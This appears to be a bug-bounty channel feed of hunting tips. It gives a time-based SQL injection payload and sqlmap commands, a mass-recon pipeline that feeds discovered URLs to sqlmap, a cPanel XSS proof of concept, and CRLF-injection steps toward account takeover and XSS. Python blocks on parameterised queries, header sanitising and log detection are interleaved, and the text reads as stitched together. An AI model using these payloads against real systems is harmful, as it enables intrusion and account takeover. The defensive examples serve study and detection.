BUG BOUNTY
PoC & Tools & Methodology
For those asking about the write-up:
I found an employee panel running on ASPX.
I always try SQL injection in the user parameter.
1)
I used a sleep payload
';WAITFOR DELAY '0:0:5'--
and the server's response was delayed by 5 s.
2)
Save the POST request in a txt file
sqlmap -r txt -p user --force-ssl --level 5 --risk 3
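The write-up above works because the user parameter is concatenated into the SQL text, so a quote in it ends the string literal and the stacked WAITFOR runs as SQL. The following is an added example, not code from this channel or from the panel it describes: it contrasts that concatenation with a bound parameter, and adds a log check that flags time-based probes. It uses sqlite3 as a stand-in for MSSQL (sqlite refuses a second statement, so the injected SQL surfaces as an error rather than a delay), and the table rows and log lines are constructed.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# The time-based probe quoted in the post above (MSSQL syntax); used here only as test input.
SLEEP_PAYLOAD = "';WAITFOR DELAY '0:0:5'--"


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the panel's user table (constructed data; sqlite3 instead of MSSQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (user TEXT, role TEXT)")
    conn.executemany("INSERT INTO employees VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "staff")])
    return conn


def build_query_unsafe(user: str) -> str:
    """The defect: the request parameter is pasted into the SQL text, so a quote in it
    ends the string literal and whatever follows is parsed as SQL."""
    return f"SELECT role FROM employees WHERE user = '{user}'"


def lookup_unsafe(conn: sqlite3.Connection, user: str):
    """Execute the concatenated query. Returns (rows, error). On MSSQL the stacked
    WAITFOR would run and stall the response for 5 s; sqlite3 refuses the second
    statement, so the injected SQL shows up as an error instead of a delay."""
    try:
        return conn.execute(build_query_unsafe(user)).fetchall(), None
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return None, str(exc)


def lookup_safe(conn: sqlite3.Connection, user: str):
    """The fix: a bound parameter. The payload is compared as a literal username and
    never reaches the SQL parser, so it matches nothing and causes no delay."""
    return conn.execute("SELECT role FROM employees WHERE user = ?", (user,)).fetchall()


# Detection side: time-delay primitives of the common backends, as seen in request logs.
TIME_PROBE = re.compile(
    r"(?i)waitfor\s+delay|\bsleep\s*\(|pg_sleep\s*\(|benchmark\s*\(|dbms_pipe\.receive_message"
)

# Constructed request-log lines; form bodies are logged URL-encoded.
SAMPLE_LOG = [
    'POST /employee/login.aspx body="user=alice&pass=REDACTED"',
    'POST /employee/login.aspx body="user=%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&pass=x"',
    'POST /employee/login.aspx body="user=bob&pass=REDACTED"',
]


def flag_time_based_probes(lines):
    """Indices of log lines whose decoded content contains a time-delay SQL primitive.
    Correlate a hit with an unusually slow response for a high-confidence alert."""
    return [i for i, line in enumerate(lines) if TIME_PROBE.search(unquote_plus(line))]


if __name__ == "__main__":
    db = make_db()
    print("unsafe:", lookup_unsafe(db, SLEEP_PAYLOAD))
    print("safe:  ", lookup_safe(db, SLEEP_PAYLOAD))
    print("flagged log lines:", flag_time_based_probes(SAMPLE_LOG))
```

The detection regex is deliberately backend-agnostic (MSSQL, MySQL, PostgreSQL, Oracle) since a scanner run with sqlmap at --level 5 --risk 3 will cycle through all of them; the authoritative fix for the panel itself is the parameterised form in lookup_safe, not input filtering.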
Top P1s to find:
1) SQL Injection
2) IDOR
3) XSS
4) CSRF
5) Session Fixation
6) OAuth Misconfiguration
7) Missing Authentication
8) Session Hijacking
9) Secret Tokens / Secret Credentials leakage
10) Use of Default Credentials
👍1
280.pdf (281.4 KB): Burp Suite Cheat Sheet
cPanel XSS
PoC: /login?user=sth%22+onfocus=%22alert()%22+id=%22xss%22+%22%ff#xss
CRLF Tip:

Starting payloads:
/end/vuln/%0a%0d
/end/vuln/%0a
...etc.

Now escalate the impact:

1- ATO
If the web app is vulnerable to Session Fixation, simply set a new cookie using the CRLF and send it to the victim, then try to log in with the injected cookies.
2- Open redirect

Just add a "Location:" header.

3- XSS

- Add the "Location:" header with the value "javascript: confirm(1)"

- Add the "Content-Length:" header; this makes the response body be read right at the end of the response headers, then add your XSS payload.
👍1
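Every escalation in the tip above rests on one defect: a request-derived value (here the path) lands in a response header without its percent-decoded CR/LF being rejected, so the attacker ends the header line and writes new ones. The following is an added example, not code from this channel: a header-value check applied after decoding, a redirect builder that refuses the two starting probes quoted above, and an access-log check that flags such requests. The host example.test and the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Characters that end a header line (or a C string); none may appear in a header value.
HEADER_CTL = re.compile(r"[\r\n\x00]")

# The starting probes quoted in the tip, as they arrive URL-encoded, and a benign path.
PROBE_PATHS = ["/end/vuln/%0a%0d", "/end/vuln/%0a"]
BENIGN_PATH = "/end/ok"


def header_value_is_safe(value: str) -> bool:
    """True if the value cannot terminate the current header line."""
    return HEADER_CTL.search(value) is None


def sanitize_header_value(value: str) -> str:
    """Strip CR/LF/NUL for the cases where the value must be echoed rather than rejected."""
    return HEADER_CTL.sub("", value)


def build_redirect(path: str) -> bytes:
    """Build a 302 whose Location echoes the decoded request path (the pattern CRLF bugs
    live in). The check runs after percent-decoding, which is where %0a/%0d become real
    line breaks; checking the encoded form would pass them through."""
    target = unquote(path)
    if not header_value_is_safe(target):
        raise ValueError("control character in header value")
    return f"HTTP/1.1 302 Found\r\nLocation: https://example.test{target}\r\n\r\n".encode()


def redirect_is_rejected(path: str) -> bool:
    """Does build_redirect refuse this path?"""
    try:
        build_redirect(path)
    except ValueError:
        return True
    return False


# Detection side: constructed access-log lines with percent-encoded line breaks in the path.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - "GET /end/ok HTTP/1.1" 302 0',
    '10.0.0.9 - - "GET /end/vuln/%0a%0d HTTP/1.1" 302 0',
    '10.0.0.9 - - "GET /end/vuln/%0A HTTP/1.1" 302 0',
]
REQUEST_PATH = re.compile(r'"[A-Z]+ (\S+) HTTP/')


def flag_crlf_requests(lines):
    """Indices of log lines whose request path decodes to a CR, LF or NUL."""
    hits = []
    for i, line in enumerate(lines):
        m = REQUEST_PATH.search(line)
        if m and HEADER_CTL.search(unquote(m.group(1))):
            hits.append(i)
    return hits


if __name__ == "__main__":
    print(build_redirect(BENIGN_PATH))
    for p in PROBE_PATHS:
        print(p, "rejected:", redirect_is_rejected(p))
    print("flagged log lines:", flag_crlf_requests(SAMPLE_ACCESS_LOG))
```

Rejecting is preferable to stripping: a stripped value silently changes the redirect target, while a rejection surfaces the probe in error logs. Mature HTTP libraries apply a check of this kind when a header is set; the bug shows up where responses are assembled by hand or the framework is old, which is why the log check is worth running regardless of what the application claims.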
Methods To Find SQLi
by 'Aswin Govind'

1. sublist3r -d target | tee -a domains
2. cat domains | httpx | tee -a alive
3. cat alive | waybackurls | tee -a urls
4. gf sqli urls >> sqli.txt
5. sqlmap -m sqli.txt --dbs --batch
Forwarded from xAL7x Cyber (copyright: © xAL7x)
Nmap Cheat Sheet